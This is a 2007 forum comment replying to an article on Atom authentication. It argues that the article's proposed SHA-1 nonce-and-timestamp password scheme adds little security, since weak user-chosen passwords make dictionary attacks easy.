Article:		Atom Authentication
Subject:		No secret sauce
Date:		2007-03-06 09:30:54
From:		cryptoanarchist
Your discussion of the need for Atom authentication is good and valid. However, I disagree that the scheme you propose at the end of the article is necessarily secure or even adds a significant amount of security over cleartext passwords. The problem is the dictionary attack of possible passwords is very easy. A number of studies on the weakness of user chosen passwords have concluded that users are just very, very bad at choosing strong passwords. As a result, the number of possible input passwords in a dictionary attack is very low, 20-25 bits of max entropy. Since nonce and timestamp are known values, dictionary attacking the unknown value requires trivial CPU time. At best, you are achieving additional layers of obfuscation and requiring the attacker to have access to an SHA-1 implementation. However, don't let that distract from the very good discussion on the need for better Atom Authentication. Better solutions in that area that folks like Bob can deploy are problems in need of solutions.

Previous Message

Next Message